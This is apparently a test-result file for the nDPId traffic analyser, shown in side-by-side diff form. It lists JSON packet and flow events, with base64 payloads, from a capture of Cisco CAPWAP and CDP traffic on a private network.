00756{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":365,"pkt_type":351,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":365,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAV+qqgMAAAwgAAK0db0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAUR2lnYWJpdEV0aGVybmV0MAAEAAgAAAADAAsABQE="}
00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":6,"source":"capwap.pcap","alias":"nDPId-test","layer_type":351,"global_ts_msec":1422328972066} 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":6,"source":"capwap.pcap","alias":"nDPId-test","layer_type":351,"global_ts_msec":1422328972066}
00803{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0iX0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAYyyAAZABCkjQAAAAA8KAAAMsg="} 00789{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0iX0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAYyyAAZABCkjQAAAAA8KAAAMsg="}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":10,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422328982066} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":10,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422328982066}
00815{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":11,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":397,"pkt_type":383,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":397,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAX+qqgMAAAwgAAK0cl0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAPAAggAAAAABAABjLIABkAEKSNAAAAADwoAAAyyA=="} 00801{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":397,"pkt_type":383,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":397,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAX+qqgMAAAwgAAK0cl0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAPAAggAAAAABAABjLIABkAEKSNAAAAADwoAAAyyA=="}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":11,"source":"capwap.pcap","alias":"nDPId-test","layer_type":383,"global_ts_msec":1422328989070} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":11,"source":"capwap.pcap","alias":"nDPId-test","layer_type":383,"global_ts_msec":1422328989070}
00815{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":12,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":397,"pkt_type":383,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":397,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAX+qqgMAAAwgAAK0cl0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAPAAggAAAAABAABjLIABkAEKSNAAAAADwoAAAyyA=="} 00801{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":397,"pkt_type":383,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":397,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAX+qqgMAAAwgAAK0cl0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAPAAggAAAAABAABjLIABkAEKSNAAAAADwoAAAyyA=="}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":12,"source":"capwap.pcap","alias":"nDPId-test","layer_type":383,"global_ts_msec":1422328993294} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":12,"source":"capwap.pcap","alias":"nDPId-test","layer_type":383,"global_ts_msec":1422328993294}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1422329005766,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1422329005766,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAARAAP8Rr9\/AqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g6AAAAAEAAGYAABQAAQAAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1422329005766,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1422329005766,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAARAAP8Rr9\/AqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g6AAAAAEAAGYAABQAAQAAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"}
00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
@@ -33,14 +33,14 @@
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1422329018033,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1422329018033,"pkt":"JOmzR64guDhh8wWsCABFwADDAAJAAEARpATAqAoKwKgKCTBcFH8ArwAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFL9Qy3RsAQJYlAAEcq6fyE50AAEkACwAFKFJLQAQC3ePdGwBAliUAARyrp\/ITnQAAHQALAAUtdhsgDQK\/xN0bAECWJQABHKun8hOdAAAOAAsABS9iq+AIAt7o3RsAQJYlAAEcq6fyE50AAAwACwAFL7WkAA0C3+g="} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1422329018033,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1422329018033,"pkt":"JOmzR64guDhh8wWsCABFwADDAAJAAEARpATAqAoKwKgKCTBcFH8ArwAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFL9Qy3RsAQJYlAAEcq6fyE50AAEkACwAFKFJLQAQC3ePdGwBAliUAARyrp\/ITnQAAHQALAAUtdhsgDQK\/xN0bAECWJQABHKun8hOdAAAOAAsABS9iq+AIAt7o3RsAQJYlAAEcq6fyE50AAAwACwAFL7WkAA0C3+g="}
00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1422329018533,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1422329018533,"pkt":"JOmzR64guDhh8wWsCABFwAEaAANAAEARo6zAqAoKwKgKCTBcFH8BBgAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFN3Va3RsAQJYlAAEcq6fyE50AACMACwAFMGt3IAoC5+ndGwBAliUAARyrp\/ITnQAAEwALAAUwdLNADQLo6d0bAECWJQABZICZPC30AAADAAsABTJ3KPD9AqWm3RsAQJYlAAH4Ht\/dIQ8AAB8ACwAFNejwUJoCvcLdGwBAliUAAfge390hDwAAEgALAAU2FOxglQK9wt0bAECWJQAB+B7f3SEPAAAcAAsABTZHxnCRAr\/A3RsAQJYlAAH4Ht\/dIQ8AAAcACwAFN246sJsCvr4="} 00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1422329018533,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1422329018533,"pkt":"JOmzR64guDhh8wWsCABFwAEaAANAAEARo6zAqAoKwKgKCTBcFH8BBgAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFN3Va3RsAQJYlAAEcq6fyE50AACMACwAFMGt3IAoC5+ndGwBAliUAARyrp\/ITnQAAEwALAAUwdLNADQLo6d0bAECWJQABZICZPC30AAADAAsABTJ3KPD9AqWm3RsAQJYlAAH4Ht\/dIQ8AAB8ACwAFNejwUJoCvcLdGwBAliUAAfge390hDwAAEgALAAU2FOxglQK9wt0bAECWJQAB+B7f3SEPAAAcAAsABTZHxnCRAr\/A3RsAQJYlAAH4Ht\/dIQ8AAAcACwAFN246sJsCvr4="}
00804{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":192,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"thread_ts_msec":1422329034032,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0KHQAAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAY8KAAZABCkjQABAAA8KAAAMsg="} 00790{"packet_event_id":1,"packet_event_name":"packet","packet_id":192,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"thread_ts_msec":1422329034032,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0KHQAAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAY8KAAZABCkjQABAAA8KAAAMsg="}
00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":192,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422329034072} 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":192,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422329034072}
00804{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":293,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"thread_ts_msec":1422329090053,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0KHQAAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAY8KAAZABCkjQABAAA8KAAAMsg="} 00790{"packet_event_id":1,"packet_event_name":"packet","packet_id":293,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"thread_ts_msec":1422329090053,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0KHQAAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAY8KAAZABCkjQABAAA8KAAAMsg="}
00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":293,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422329091711} 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":293,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422329091711}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":351,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":180000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422329129029,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":351,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":180000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422329129029,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1422329136181,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1422329136181,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAGlAAP8Rr3rAqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g\/wAAABMAAGYAABQAAQEAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"} 